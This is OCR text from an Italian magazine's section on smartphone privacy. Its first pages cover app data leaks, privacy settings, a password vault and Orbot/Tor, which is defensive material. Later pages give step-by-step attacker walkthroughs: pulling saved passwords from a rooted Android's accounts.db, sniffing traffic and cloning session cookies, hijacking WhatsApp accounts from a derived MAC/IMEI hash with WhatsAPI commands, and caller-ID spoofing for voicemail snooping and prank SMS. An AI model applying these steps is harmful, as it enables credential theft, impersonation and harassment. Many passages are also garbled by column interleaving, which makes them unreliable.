esattamente quello per cui le instal¬ 
liamo: ci fanno divertire, ci aiutano 
nel lavoro e nell’organizzare la no¬ 
stra giornata, e molto altro ancora, 
tuttavia, in alcuni casi, sono anche 
delle micidiali spie pronte a rivelare 
le nostre informazioni personali allo 
sviluppatore o ad apposite agenzie 
pubblicitarie. Affermazione un po’ 
azzardata? Non proprio, perché chi è 
un po’ smaliziato in fatto di tecnologia 
può verificare subito se qualche app 
gioca brutti scherzi. Sfruttando una 
connessione WiFi col proprio disposi¬ 
tivo Apple, ed analizzando il traffico 
wireless con qualche software open 


source, è infatti possibile analizzare 
tutti i dati scambiati tra le applica¬ 
zioni e il mondo esterno. Ed è così, 
per esempio, che si scopre che Pan¬ 
dora, una delle applicazioni musicali 
più diffuse, è una delle più temibili 
“chiacchierone". Diffonde, infatti, non 
solo il codice identificativo di ogni 
utente, ma anche la sua posizione 
a terze, e non definite, parti. A farle 
buona compagnia, in realtà, pare ci 
siano molti altri software. Nella mag¬ 
gior parte dei casi si tratta di soluzioni 
gratuite, i cui ricavi dipendono dalle 
pubblicità mirate. E cosa si usa per 
"mirarle” se non proprio loro, i dati 
personali? In altri casi, questi preziosi 
dati sono invece venduti in toto, come 
si trattasse di merce qualsiasi. E in ba¬ 
se ad applicazione e impostazioni del 
telefono dell’utente, si parla non solo 
di locazione e codice 1D, ma anche di 
età, sesso, preferenze e altro ancora. 

COME RIMEDIARE 

La nostra privacy è davvero i n perico¬ 
lo, dunque, e l’utilizzo indiscriminato 
degli smartphone offre terreno fertile 
a sviluppatori senza scrupoli per corn¬ 
iti narne di tutti i colori. Difendersi 
è possibile: nelle prossime pagine 
raccogliamo una serie di trucchi per 
metterci al riparo dagli sguardi digi¬ 
tali più indiscreti, anche se in qualche 
caso dobbiamo dire addio a funzioni 
utili. 

O per lo meno, dobbiamo limitar¬ 
ne l'utilizzo. In questo modo, però, 
potremo ammirare il nostro gioiello 
hitech senza il timore che qualcuno, 
a migliaia di chilometri di distanza, 
sappia quel che stiamo facendo. 



■ Un software per iPhone è in grado di 
trasformare letteralmente il Melafonino in uno 
strumento di spionaggio: si chiama FlexySpy 
(www.flexispy.com) e può girare solo su un 
iPhone sbloccato. Occhio! 
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iPhone cosi ci spiano 


Ti spio da PC 



Cosa ci guardano? 

QUALI INFORMAZIONI RISCHIANO DI ESSERE TRAFUGATE DAL NOSTRO 
SMARTPHONE? 


ECCO COME E DOVE TROVARE I DATI A RISCHIO 


P uò sembrare un para- stro gioiellino, che nel caso all'insaputa degli utenti. Di¬ 
dosso, ma il nostro caro del Melafonino assume il verse applicazióni, infatti, 
e fedele compagno di tutti nome di UDID, associato soprattutto quelle gratuite, 
i giorni, può trasformarsi all'account iTunes di ciascun utilizzano l’UDID utente per 
nel nostro peggior nemico utente. Ebbene,proprioque- proporre pubblicità (e non 
e prelevare i nostri dati per- sto UDID è l’elemento che solo) localizzate in italiano 
sonali. Ma com’è possibile troppe app, specie quelle che o contestualizzate ai propri 
che il nostro iPhone ci spii? si appoggiano ad un sistema usi. Com'è possibile? Seguia- 
II tutto risiede nell’]Ddel no- GPS, tendono a diffondere mo i passi di seguito... 


01 CODICE PERSONALE 



02 DAL SERIALE A 




Il codice ID identifica inequivocabilmente il nostro 
telefono. Nel caso di un iPhone è detto UDID, è 
associato all’account iTunes e, dunque, è ancora 
più personale. La brutta notizia è che molte app 
tendono a diffonderlo a nostra insaputa. Ma dove 
possiamo vederlo? Colleghiamo iPhone al compu¬ 
ter e avviamo iTunes. 


Nel caso non sia già selezionata, clicchiamo, nella 
colonna di sinistra, su iPhone di XXX (dove XXX e 
il nome associato al dispositivo). Nella finestra che 
compare, a destra, vediamo un codice in Numero 
di serie. Occhiamoci sopra et voilà: ecco servito il 
codice UDID. È questa la preziosa stringa tanto abi¬ 
ta dalle app spione. 



03 LA POSIZIONE 


04 GRATIS? INSOMMA 


05 NO SPOT, GRAZIE 


Attiva i servizi <H 
localizzatone per consentire 
a "Pianeti" di determinare la 
tua posizione 


Impostazioni * Annulla 


SCARICA 


: GRATIS 1 



[ Scare 

fliP' n 

t Sosti 

■r' I 

1 Sobmit ; 



1 Xore / J 


1 Best! 


| Scibmrt B 



Alcune app, come quelle astronomiche, richiedono 
di “localizzarci'’, tramite il GPS integrato nel dispo¬ 
sitivo, per il loro normale funzionamento. In altri casi 
la localizzazione è effettuata senza alcuna richie¬ 
sta, solo per trasmettere le coordinate ad apposite 
agenzie. Terribile, ma nelle prossime pagine sco¬ 
priamo come fermare l'inganno! 


Anche la versione gratuita del gioco best-seller 
Paper Toss invia dati a nostra insaputa, ovvero la 
nostra posizione, per trasmettere pubblicità con¬ 
fezionate ad hoc. Ecco perché buona parte delle 
inserzioni si riferiscono a prodotti o servizi in italia¬ 
no. Passando alia versione a pagamento, la funzio¬ 
ne è rimossa e la privacy salva. Oppure... 


Disattivando il GPS e qualsiasi connessione dati 
del nostro dispositivo (anche quella WFi), Paper 
Toss Free non ha modo di attingere i dati che 
gli servono e, per la maggior parte del tempo, 
non visualizza le fastidiose e impiccione pubbli¬ 
cità. In fondo, per proteggere i nostri dati, basta 
davvero poco. 





















OTi spio da PC 


iPhone cosi ci spiano 


Alla larga dagli spioni 

POSIZIONE E DATI PERSONALI POSSONO ESSERE 
MESSI AL SICURO IN POCHE MOSSE 


MODIFICHIAMO LE IMPOSTAZIONI PER SALVARE LA PRIVACY 


T ante, tantissime opzioni. 

Sono quel le messe sul piat¬ 
to da qualsiasi smartphone 
che si rispetti. Una jungla 
nella quale è facile perdersi e, 
soprattutto, perdere d'occhio 
le impostazioni importanti. 
Qualche sviluppatore punta 
proprio sulla disattenzione 
per confezionare funzioni in 


grado di prendere qualche 
dato in più del dovuto. Per 
fortuna, queste impostazioni 
sono facilmente riconoscibili 
e... modificabili. Le principali 
sono due: quella di localizza- 
zionee quella relativa al traf¬ 
fico dati. La prima fornisce la 
nostra posizione sfruttando il 
ricevitoreGPS del dispositivo, 


mentre la seconda gestisce le 
informazioni ricevute e in¬ 
viate dal terminale. In questo 
secondo caso, certo, parliamo 
anche dei dati relativi agli uti¬ 
lizzi on line, come navigazio¬ 
ne e posta elettronica. Ma c’è 
qualche app si prende pure 
la briga di trasmettere dati 
anche off line. 


01 NESSUNA POSIZIONE ■ 02 VIA IL BLUET00TH! 



È la localizzazione una delle principali gioie, e dei 
dolori, degli utenti. Il "dolore" deriva dalla possi¬ 
bilità di essere identificati ovunque dalle app più 
indiscrete. Per evitarlo, dal nostro iPhone andiamo 
su Impostazioni Da qui, tappiamo su Generali e 
impostiamo Localizzazione su Off Tra l’altro, que¬ 
sto ci fa risparmiare batteria. 



La vulnerabilità del bluetooth è nota: gli hacker 
lo prendono di mira volentieri e rischiamo gros¬ 
so. Quindi, se non è necessario, disattiviamolo. Per 
farlo, dalla schermata iniziale tappiamo su Impo¬ 
stazioni, poi su Bluetooth e, infine, disattiviamolo. 
Anche in questo caso, la disattivazione contribuisce 
a migliorare l’autonomia. 


03 SMS DI CONFERMA 



Gli esperti segnalano che qualche app potrebbe 
prendersi il lusso di inviare e ricevere dati a nostra in 
saputa. Che fare? Blocchiamo il traffico dati quan¬ 
do siamo certi di non utilizzarlo! Sempre dal menu 
Impostazioni del nostro iPhone, tappiamo su Gene¬ 
rane poi su Rete. Da qui, disattiviamo la voce Dati 
cellulare. Vittoria per la nostra privacy! 


PIÙ 0 MENO 
CON TUTTI 

In queste pagine prendiamo come esempio 
lo smartphone piti noto, iPhone, ma i 
concetti espressi sono perfettamente 
applicabili a moiti altri modelli, specie 
quelli basati su Android. Anche questi 
dispositivi, infatti, dispongono di opzioni 
dedicate a localizzazione e gest ione dei 
dati. Ricordiamoci che il problema, spesso, 
non dipende dall'hardware, ma proprio dai 
software, cioè le applicazioni. Sono queste 
che possono sfruttare in modo indebito 
le funzioni dei telefoni e il nostro scopo è 
quello di restringere il loro campo d'azione. 
Cerchiamo nel nostro dispositivo le opzioni 
che consentono di proteggere la privacy, 
prima ancora di installare nuovi programmi. 
Roba da maniaci della discrezione? Un po' 
sì, ma meglio esagerare, quando si tratta dei 
nostri dati personali. 
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iPhone cosi ci spiano 


Ti spio daPCf^ 



Tutto al sicuro 

PROTEGGIAMO I DATI PRIVATI NELLA MEMORIA DI IPHONE, IPOO 
TOUCH E IPAD 


FACILE, VELOCE E GRATUITO GRAZIE ALL'APP KEEPER 


S e è ormai lecito dubita¬ 
re della protezione della 
nostra privacy da parte degli 
smartphone, lo diventa dubi¬ 
tare anche della sicurezza dei 
nostri dati riservati. Insomma, 
localizzarci su una mappa e 
rilevare le nostre preferenze 
è un gioco da ragazzi e nulla 


toglie che qualche truffatore 
informatico possa accedere a 
dati ancora più preziosi. Codici 
di carte di credito, dati d’au¬ 
tenticazione a servizi on line, 
password e molto altro. Del re¬ 
sto spesso fa comodo registra¬ 
re questi dati nella memoria 
dello smartphone, per averli 


sempre a portata di mano. E 
allora, come proteggerli? Cre¬ 
ando una cassaforte digitale nel 
telefono. 'Ritto quel che ci serve 
è una delle tante applicazioni 
disponibili sul mercato. Nel 
caso dei dispositivi Apple, per 
esempio, c’è Keeper Password 
& DataVault. 


01 SAI TENERE UN SEGRETO? 



Per prima cosa andiamo in App Store, dal nostro 
dispositivo. Da qui, tappiamo su Cerca e digitia¬ 
mo la stringa Keeper Individuiamo la versione di 
Keeper Password & Data Vault più adatta (iPho¬ 
ne e iPad quelle disponibili) e tappiamo sulla rela¬ 
tiva voce. Fatto questo tappiamo su Gratis e poi su 
Installa App. Digitiamo la password iTunes e tap¬ 
piamo su Ok. 


03 ACCESSO TOP-SECRET 


Keeper 



Se abbiamo altri dati da registrare ripetiamo l'ope¬ 
razione, in caso contrario abbandoniamo l’appli¬ 
cazione. Quando ci torniamo, successivamente, 
nella prima finestra ci viene richiesta la password 
di accesso. Digitiamola e, in men che non si dica, 
eccoci entrati nella nostra preziosa cassaforte digi¬ 
tale. Massima sicurezza, minimo sforzo! 


02 DATI RISERVATI 



Avviamo l’applicazione. Nella prima finestra, inse¬ 
riamo una chiave d’accesso in Password, da ripe¬ 
tere nella casella Ripeti. A questo punto tappiamo 
su Login. Per inserire un primo dato da protegge¬ 
re, tappiamo su +, in alto a destra, Compiliamo il 
modulo in tutti i suoi punti Quando abbiamo fini¬ 
to, tappiamo su Salva, per tornare alla finestra 
iniziale. 



In realtà, dietro un funzionamento semplice, Kee¬ 
per cela un mucchio di opzioni. Come quella che 
consente di esportare tutti i nostri dati. Dalla fine¬ 
stra principale tappiamo su Sincronizzare, poi su 
Importazione/Esportazione e su Esporta Plain- 
text. Inseriamo i dati di un nostro account FTP e 
tappiamo su Esportazione ora. 
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V Ti spio da PC 


Navigare anonimi dal telefonino 


Navigare anonimi 
con il telefonino 


Cosaci 

occorre 


PACHI 


APP PER LA NAVIGAZIONE 
ANONIMA SU AN0R0I0 

ORBOT 


SOFTWARE COMPLETO 


Sito Internet; 

https://play.google.com 


Quando ti colleghi ad Internet dal tuo smartphone, qualcuno 
potrebbe spiarti! Solo noi ti diciamo come difendere la tua privacy 


S empre più spesso, specialmente nei 
casi in cui siamo particolarmente lon¬ 
tani da casa, controlliamo la posta 
elettronica o le ultime notizie in arrivo da 
Facebook direttamente dal nostro smar¬ 
tphone o tablet Android. Come difende¬ 
re, dunque, il nostro anonimato in questi 
particolari casi? A rispondere adeguata- 
mente alle nostre esigenze ci pensa Or- 
bot, l'applicazione rigorosamente gratu¬ 
ita che si appoggia alla rete Tor. Per esse¬ 
re chiari, si tratta di una tecnica che ope¬ 
ra una sorta di "smistamento" del nostro 
indirizzo IP, ossia del codice univoco che 
ci distingue nell'ambito della Rete. In que¬ 
sto modo, non sarà asssolutamente pos¬ 
sibile rintracciare il nostro indirizzo IP da 
parte di chiunque voglia risalire ad esso 
(leggi box Buoni consigli). Cos'altro aspet¬ 
tiamo, allora? Installiamola subito sul no¬ 
stro telefonino! 



Applicazioni 


Orbot: Tor on Android 


Configuro Torificotion 


I O»boe ?we j yoci :be opooii to rcmtt oli 
sppK.u'.ty») <**«•{ m» ibAti To» QR ìd cfccse 


BBpioxy AIIApp-s HuopghTor 


Facciamo un salto 

sul P lay Store 


B La prima cosa da 
fare è quella di 
verificare che il 
nostro smartphone o tablet 
Android sia connesso ad 
Internet. Dopo aver effet¬ 
tuato l'accesso alle reti 
mobile, possiamo accede¬ 
re al Play Store di Google e 
da qui ricercare l'app gra¬ 
tuita Orbot. Una volta tro¬ 
vata la pagina di nostro 
interesse tappiamo sem¬ 
plicemente sul pulsante 
Scarica e confermiamo con 
Accetta e scarica. In questo 
modo potremo effettuare 
direttamente il download 
e l’installazione dell’app. 
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Permissions 


You can optionally grant Orbot 
'Superuser' access to enable 
advanced features, such as 
Transparent Proxying. 


Request Superuser Access 


If you do not want to do this, 
please make sure to use apps 
made to work with Orbot 


I understand and would like to 
continue without Superuser 


Permessi 

nec essari 

B AI termine del¬ 
la procedura, 
che può varia¬ 
re in base al tipo di con¬ 
nessione utilizzata, av¬ 
viamo l’app per iniziare 
la configurazione guida¬ 
ta di Orbot. Tappiamo 
quindi sul pulsante Neri 
e selezioniamo Request 
Superuser Access per 
abilitare i permessi di 
amministrazione, necs- 
sari per il corretto fun¬ 
zionamento dell'app 
stessa. Confermiamo 
quindi con Consenti e 
attendiamo qualche se¬ 
condo. All termine, pro¬ 
seguiamo quindi con 
Next. 
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Transparent Proxying 


This allows your apps to 
automatically run through thè 
Tor network without any 
configuration. 

( Proxy All Apps Through Tor 

(Check this box you bave no idea 
what we are calktng annui) 

: Select Individuai Apps for Tor 


V None 



Per tutti o soltanto 

per alcuni... 

B A questo pun¬ 
to è finalmen¬ 
te arrivato il 
momento di decidere 
se attivare la navigazio¬ 
ne sicura e anonima su 
tutte le applicazioni in¬ 
stallate sul nostro tele¬ 
fonino (ovviamente 
capaci di connettersi ad 
Internet) o solo su alcu¬ 
ne. Se volessimo ope¬ 
rare solo su un certo 
numero di applicazioni, 
selezioniamo ad esem¬ 
pio Select Individuai 
Apps for Tore prose¬ 
guiamo con Next. At¬ 
tendiamo ora che venga 
caricato l'elenco con 
tutte le app presenti. 
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Ti spio daPCC* 


Navigare anonimi dal telefonino 
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.riti 

l Archiviazione impostatemi 


t 

Z) Barra di stato 



Browser 


ra 

i. — i 

CMStats 




Quali app scegl i ere? 


B Una volta apparso l'elenco completo, scorriamo la lista 
dette app e selezioniamo quelle di nostro interesse (ad 
esempio Browsere d Email}. Terminiamo con un tap sul 
-pulsante dose che ci riporterà nella schermata del Passo 3. 
Terminiamo con Next. 



Bootstrapped 100%: Pone. 


Orbot attivato 


0 Appare l'interfaccia principale di Orbot con un grosso 
pulsante di accensione at centro. Teniamolo tappato 
fino a quando non appare un messaggio di conferma. 
Dopo pochi secondi, tutto è pronto per iniziare a navigare in 
maniera totalmente anonima, 



i 


Congratulations. Your browser is configured to 
use Tor. 


Ptease reta to thè Taryebate fot further information atout usng Tor ufety You are rrow free to brovwe 
thè Internet anonymousiy 

Yoor IP address appesa to be 80 237 226.74 



La n ostra privacy è garantita 

B Premiamo il pulsante Menu del telefonino e selezionia¬ 
mo l’opzione Check. Si apre quindi una finestra del 
browser: se appare il messaggio “Congratulations. Your 
browser is configured to use Tor”, tutto è andato per il verso 
giusto e possiamo iniziare subito a navigare. 


Fine della sessione 

Possiamo verificare lo stato di Orbot tramite un’icona 
nella tray bar di Android: se c'è raffigurata una cipolla 
verde, vuol dire che tutto procede secondo i piani. Per 
terminarlo, invece, tappiamo sull’icona e successivamente tap¬ 
piamo sul pulsante centrale presente nell’interfaccia di Orbot. 




In una normale comu¬ 
nicazione Internet, il 
nostro PC (riconosciuto 


univocamente sul Web 


con un ben preciso 
indirizzo IP) scambia 
dati con un server (ad 
esempio un sito Web 
raggiunto o l'Internet 
Provider). Così facendo, 
quest'ultimo è in grado 
di conoscere il nostro IP, 
e di conseguenza riusci¬ 
re anche a localizzarci. 

È un po'come alzare 
la cornetta e fare una 
telefonata: la persona 
chiamata vedrà sul suo 
display il nostro nume¬ 
ro di telefono. La rete 
Tor, per proteggere il 
nostro anonimato, non 
fa altro che accogliere 
la richiesta di contatto 
verso un qualsiasi sito 
Web smistandola però 
prima a migliaia di 
computer di tutto il 
mondo. Così facendo, 
il server contattato, 
non sarà in grado di 
visualizzare il nostro 
indirizzo IP, ma si per¬ 
derà fra i mille indirizzi 
presenti. 


PROTEZIONE OLTRE OGNI LIMITE 


Se vogliamo attivare la navigazione si¬ 
cura per tutte le applicazioni installate 
sul nostro telefonino, avviamo Orbot e 
premiamo il pulsante Menu del cellulare. 
Selezioniamo poi Settings e da qui ricer¬ 
chiamo l'opzione Tor Everything: non 
ci resta che attivarla, è possibile fare in 
modo che siano protetti anche i device 
che navigano attraverso il nostro smar¬ 
tphone. Se utilizziamo le funzionalità di 
tethering (per condividere la connessione 
3G via Wi-Fi o USB) possiamo proteggere 
anche tutti gii altri dispositivi connessi. 
Per farlo, basta selezionare l'opzione Tor 
Tethering sempre presente nel menu 
Settings 


Per incrementare ulteriormente il livello di 
sicurezza, possiamo evitare che Orbot uti¬ 
lizzi dei nodi italiani della rete Tor (e dun¬ 
que navigare utilizzando esclusivamente 
indirizzi IP stranieri) selezionando Exdude 
Nodes dal menu Settings e compilando 
il campo presente con italy. Terminiamo 
con O/C. Riconnettiamo quindi Orbot. Do¬ 
po aver attivato questi livelli di protezione, 
può capitare che durante la navigazione 
alcuni siti rilevino strani "movimenti” sul 
nostro computer. Effettuando ad esempio 
una ricerca sul motore di Big G, potreb¬ 
be esserci richiesto l'inserimento di un 
captcha code prima di poter proseguire: 
inseriamolo senza indugi. 
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O Ti spio da PC 


L'aspira password per cellulare I 




G li smartphone e i tablet, ormai sempre 
più usati, sono a tutti gli effetti piccoli 
computer, e come tali sono esposti a 
tanti rischi in termini di sicurezza. Ci sia¬ 
mo mai chiesti, ad esempio, dove vengono 
memorizzate tutte le password che utiliz¬ 
ziamo per accedere agevolmente a Face- 
hook o alla casella di posta elettronica dal 
nostro terminale Android? Effettivamente 
non capita tutti i giorni di badare a questi 
particolari, visto che siamo ancora abituali 
a pensare allo smartphone come a un sem¬ 
plice telefonino. Così non è. Ogni password 
viene infatti memorizzata, il più delle volte 
in chiaro, all'interno di un database conte¬ 
nuto fra i file di sistema di Android. In caso 


Ecco come 
il pirata 
scova tutte 
le password 
memorizzate 
nel telefonino 
della sua 
vittima. 


^ Tutto ha inizio da un app 

■| ! Se il pirata entra in possesso di un tele- 
'\rnme 1 fono “rootato”, per iniziare la sua opera 
ha bisogno del file manager Root Explorer (può 
acquistarla direttamente da Google Play o cercare 
sul Web un .apk funzionante). Dopo l'installazione, 
avvia Root Explorer e con un tap su Consenti gli 
assegna i permessi di amministrazione. Si sposta 
dunque nella directory principale ed accede alla 
cartella data. 




Ìf| IH .-iSt 

h 


I 


password 
nw cellulare 

C’è chi trasforma il proprio 
dispositivo in un passepartout per 
scardinare qualsiasi protezione 


Tutto in chian 

































I L'aspira password per cellulare I 


Ti spio da PC| 


a Ecco lo sniffa tutto mobile 

Cronologia Web, indirizzi IP visitati, cookie... il pirata usa le app Shark for Root e Shark Reader per accedere 
a informazioni segrete sullo smartphone della vittima. Incredibile ma vero. 



Strumenti di sistema 
tempero applicazioni in ésecuztona 



s d f g h j k I 
zxcvbnmcs 





Telefonate 

Lettura stato e Identità del telefono 


Strumenti di sistema 

Recupero applicazioni In esecuzione 
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a Un’app per la cattura... 

■j | Prima dello sniffingdeipacchetti.il pirata 
installa BusyBox da Google Play. Tappa 
Scarica/Accetta e scarica, riawia lo smartpho¬ 
ne e termina l’installazione. Installa quindi l'app 
Shark for Root sul telefono della vittima, la avvia 
e con Consentile assegna i permessi di ammi¬ 
nistrazione. Preme Start per catturare i pacchetti 
in transito sulla LAN a cui è connesso. 


a ... e una per l’analisi 

2 I Al termine della cattura, il pirata ricerca 
e installa l’app Shark Reader (fondamen¬ 
tale per la lettura dei pacchetti “sniffati"). Non gli 
resta che installarla. Dopo aver tappato Stop in 
Shark for Root, il pirata analizza ciò che ha cat¬ 
turato premendo Open capture file ( You can use 
Shark Beadei): la decodifica dei pacchetti dura in 
bastila quantità di dati. 


▲ Cookie d’accesso clonati 

3 i Shark Reader decodifica i pacchetti cattu 
rati da Shark for Root e visualizza ITP del¬ 
la vittima, la destinazione raggiunta (il sito Web 
contattato dall'utente) e la porta di comunicazio¬ 
ne. Con un tap sul nome del pacchetto, visualizza 
informazioni come il browser usato e cookie scam¬ 
biati. Con questi ultimi può clonare sessioni di login 
ai servizi usati dalla vittima. 


di smarrimento del telefonino o del tablet, 
ari un malintenzionato bastano realmente 
pochi secondi per impossessarsi di tutti i no¬ 
stri account. E non solo! Il malintenzionato, 
installando qualche app, è in grado anche di 


"sniffare” preziose informazioni, come i siti 
che vistiamo e cookie, usabili per accedere ai 
servizi Web che utilizziamo. Affinché tutto 
vada per il verso giusto, però, il pirata deve 
mettere le mani su un terminale dotalo di 


diritti di amministrazione, ovvero, in gergo 
tecnico, "rootato”. Prestiamo dunque mas¬ 
sima attenzione a dove lasciamo il nostro 
preziosissimo telefonino: potremmo avere 
brutte sorprese. 


con un’app! 



Richiesta codice seriale... 

2 I Si sposta nella directory System e ricer- 
ca il file accounts.db, owero il databa¬ 
se con i dati memorizzati per il login ai servizi 
on-line configurati sul telefonino. Il pirata tap¬ 
pa quindi sul file per avviarlo, seleziona la voce 
accounts e visualizza tutti gli account memoriz¬ 
zati. Alcune password possono essere crittogra- 
fate ma il pirata ha i suoi metodi per decifrare 
ciò che vuole! 


ANALISI COMPLETA SUL COMPUTER 


L'analisi dei pacchetti sniffati può 
avvenire anche direttamente dal¬ 
lo smartphone Android. Ma se il 
pirata vuole avviare un processo 
di decodifica più accurato può 
trasferire il file .peap, contenente 
tutti i pacchetti catturati da Shark 
for Root (e salvato nella home 
directory del terminale Android), 
sul proprio PC. Utilizzando poi il 
software Xplico (presente nella 
distribuzione Linux BackTrack 
5 R2, leggi Win Magazine 160, 
pag 52) e con un po'di fortuna 
può scoprire qualche password 
digitata dalle vittime connesse 
alla rete Wi-Fi. Per farlo, il pirata si 
procura una copia di BackTrack 
5 R2 ed avvia da Applications/ 
BackTrack/Information Gathe- 
ring/Network Analysis/Network 
Traffic Analysìs il software Xpli¬ 
co web gui. Avvia quindi una 


nuova sessione del Terminale 
e digita il comando /etc/init.d/ 
xplico start. 

Digita localhost:9876 nella barra 
degli indirizzi del browser per 
visualizzare l'interfaccia di Xplico. 
inserisce ai campi username e 
password il testo xplico e confer¬ 
ma con un clic su Login. Preme 
New Case e da Data Acquistion 
sceglie Uploading PCAP capture 
file/s. Conferma con Create. 


Non gli resta che cliccare su New 
Session, inserire un nome identi¬ 
ficativo e confermare con Create. 
Apre quindi la sessione appena 
creata, raggiunge la voce Pcap 
sete preme Browse per caricare 
il file .pcap trasferito dal telefoni¬ 
no al PC. Dopo aver confermato 
con Upload: Xplico si mette al 
lavoro decodificando tutti i dati 
catturati e fornendo in output 
tutto ciò che è riuscito a scovare. 
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I Scherzi telefonici ma col trucco I 


Ecco come prendere in giro i nostri amici 

inviando loro SMS con il mittente“camuffato” 


Cosaci 

occorre 


— _ SERVIZIO DI ANONIMATO 

■ _■ ■ ■ m m M SPOOFCARD 

Scherzi telefonici ; - 
ma col trucco 


S tanchi dei soliti scherzi telefonici agli amici? Proviamo allora 
ad immaginare cosa succederebbe se riuscissimo ad inviare a 
qualcuno di nostra conoscenza un SMS, magari provocatorio, 
con un numero di telefono a piacere scelto come mittente. Potremmo ad 
esempio fargli recapitare un messaggio inviatogli da una sua... amante 


segreta: la reazione sarebbe a dir poco meravigliata e il risultato finale 
dello scherzo molto divertente, a patto di non esagerare con le provo¬ 
cazioni. Curiosi di sapere come mettere in pratica uno scherzo simile? 
Bastano uno smartphone, un servizio on-line e il gioco è fatto! Ma attenti 
a non invadere la privacy altrui per non incappare nei rigori della legge. 



Un servizio su misura 

Prima di tutto è necessario registrarsi sul 
: sito www .spoofcard.corn (leggi pure arti¬ 
colo di pagina 50). Tale servizio permet¬ 
te di modificare il proprio numero di telefono sia 
durante una telefonata, sia durante l'invio di un 
SMS. 



Un’e-mail di conferma 

Riceveremo tramite posta elettronica un 
messaggio contenente un codice a 9 cifre 
che ci permetterà di accedere al nostro 
account. Copiamolo ( Ctrl+C ) negli Appuntiti Win¬ 
dows, torniamo nel browser e procediamo con l'ac¬ 
cesso al servizio. 




H credito è quello giusto 

B Cucchiamo SIGN UP in alto a destra e sele¬ 
zioniamo il pacchetto di credito preferito. 
Nonostante la scelta consigliata sia la sot¬ 
toscrizione mensile da 24.95 dollari, quest'ultima 
è sconsigliata poiché il pagamento una tantum non 
è disponibile per le telefonate in Italia. 


Registrazione in corso • 

È quindi necessario compilare un modulo 
con i propri dati anagrafici e di pagamento. 
Per velocizzare tale operazione clicchiarno 
Sign Up with Facebook per estrarre i nostri dati 
personali dall’account Facebook. Per completare 
l'acquisto non resta che cliccare Purchase Credits. 




Effettuiamo il ioqin 

a Tornati sul sito SpoofCard.com clicchiarno 
Login-, digitiamo il codice a 9 cifre e, come 
ulteriore misura di sicurezza, selezioniamo 
le immagini in base alla richiesta effettuata dai ser¬ 
ver di SpoofCard: nel nostro caso ci è stato chiesto 
di selezionare le tre foto con i fiori. 


Inviamo il primo SMS 

Effettuato il login apriamo il tab SMS, indi¬ 
chiamo il numero del destinatario del mes¬ 
saggio ( Destinantion Mobile Number) e 
quello da visualizzare come mittente ( Caller ID 
Display, nonché il messaggio da visualizzare e 
clicchiarno Place: lo scherzo è servito! 
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Tecniche e strumenti usati dai pirati per leggere 

le conversazioni private effettuate con WhatsApp! 


Così ci spiano 
i messaggi SMS 


W hatsApp è uno dei servizi più usati per inviare SMS gratuiti tra gli 
utenti mobile, mediante una semplice connessione ad Internet. 
Non occorre neanche effettuare una registrazione, poiché viene 
sfruttato, come credenziale d’accesso, il proprio numero di cellulare. Seb¬ 
bene a prima vista questa soluzione sembri “comoda”, in realtà è alla base di 
un'importante falla di sicurezza del servi zio che al momento in cui scriviamo 
non è stata ancora risolta. La password che viene generata, infatti, non è 


così casuale come sembra: essa viene calcolata mediante un'operazione di 
reverse engineering del MAC Address Wi-Fi del cellulare, o direttamente del 
codice IMEI. Quindi, se qualcuno riuscisse a scoprire l’indirizzo fisico della 
scheda di rete (bastano una distro Linux e uno scanner di rete come Nmap) 
potrebbe far credere ai server di WhatsApp di essere un’altra persona e leg¬ 
gere o scrivere messaggi al posto suo. Quella che vedremo è ovviamente una 
pratica illegale, da non provare per non incorrere in guai seri con la giustizia! 





1 dati prima di tutto 

B ll primo passo che compie il pirata è quello 
di recuperare l'indirizzo fisico della scheda 
di rete Wi-Fi: per farlo, può connettersi da 
PC ad una rete pubblica e con programmi come 
NMAP o Autoscan effettua una scansione per indi¬ 
viduare le periferiche e annotarsi i loro MAC Address. 


Un po’ di calcoli 

0 Se il malintenzionato vuole leggere i mes¬ 
saggi di una persona che conosce gli chie¬ 
de di connettersi alla sua rete, riuscendo 
così ad annotarsi il MAC Address. Ottenuto IIP, lo 
digita sul sito www.winmagazine.it/link/1810 per 
convertirlo da ASCII a codifica MD5. 


Ecco la falla nel sistema 

Il pirata si collega a: https://r. whatsapp.net/ 
1v1/exist.php?cc=$countrycode&in=$pho 
nenumber&udid=$password digitando 39 
in countrycode e il numero di telefono dell’utente 
al postodi phonenumber. In password, sostituisce 
quello recuperato al passo precedente. 






L’applicazione soia 

a Verificata la vulnerabilità nello smartphone 
della vittima, il pirata scarica, dopo una 
breve ricerca oppure scovandolo su qualche 
sito di file hosting, il programma WhatsAPI che gli 
permetterà di sbirciare tra i messaggi privati di 
WhatsApp in maniera abbastanza semplice. 


Cambio di identità! 

B ll pirata si sposta quindi nella cartella Test 
di WhatAPIe con un editor di testo apre il 
file whatsapp.php. Quindi ne modifica il 
contenuto inserendo i dati che ha ottenuto nei pas¬ 
si precedenti: Snickname = “WhatsAPI Test"; 
$sender= ‘nunem_lel~:Simei= "AABB:CC:DD:EE:FF” 


La spia in azione 

a Per leggere i messaggi della vittima il pira¬ 
ta digita da Terminale il comando php 
whatsapp.php -inumerò di telefono, men¬ 
tre se vuole inviare un SMS fingendosi la persona 
spiata digiterà php whatsapp.php -s “numero di 
cellulare ricevente" “testo del messaggio”. 
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Iscrizione a SooofCard 

Prima di tutto il malintenzionato si iscrive al sito SpootCard.com per poter 
modificare il proprio numero di telefono che appare sul display della perso¬ 
na chiamata. Il servizio offerto da Spoofcard è a pagamento... ma per il 
pirata questo è solo un dettaglio, 


ie spia 

C’è chi riesce ad origliare dal 
proprio telefonino i messaggi 
vocali altrui lasciati in segreteria 


I mmagina di estrarre il tuo tele¬ 
fono dalla tasca dei pantaloni, 
di comporre un numero e di 
poter ascoltare in pochi istanti la 
segreteria telefonica di qualsiasi 
persona desideri. Attento, perchè 
non si tratta di un film degno di Ja¬ 
mes Bond, ma della realtà. Questo 
è quello che un malintenzionato 
riesce a mettere in pratica per spia¬ 
re le conversazioni altrui. Grazie a 
un piccolo escamotage, infatti, è 
possibile ascoltare i messaggi la¬ 
sciati all'interno delle segreterie 
telefoniche di qualsiasi persona che 
abbia il servizio abilitalo sul proprio 
numero di cellulare. 

Colpa dello spoofing 

La tecnica che andremo ad analiz¬ 
zare è quella dell’ID spoofing telefo¬ 
nico. In sostanza, si tratta di andare 
a modificare il proprio numero di 
telefono con uno scelto a piacere 


(in questo particolare caso con il 
numero della persona di cui si vo¬ 
gliono ascoltare i messaggi in segre¬ 
teria), facendo credere al gestore di 
telefonia mobile di essere un utente 
invece di un altro per accedere alla 
casella telefonica di quest'ultimo. 
Abbiamo verificato che il trucco 
adottato dai pirati funziona con i 
principali operatori di telefonia mo¬ 
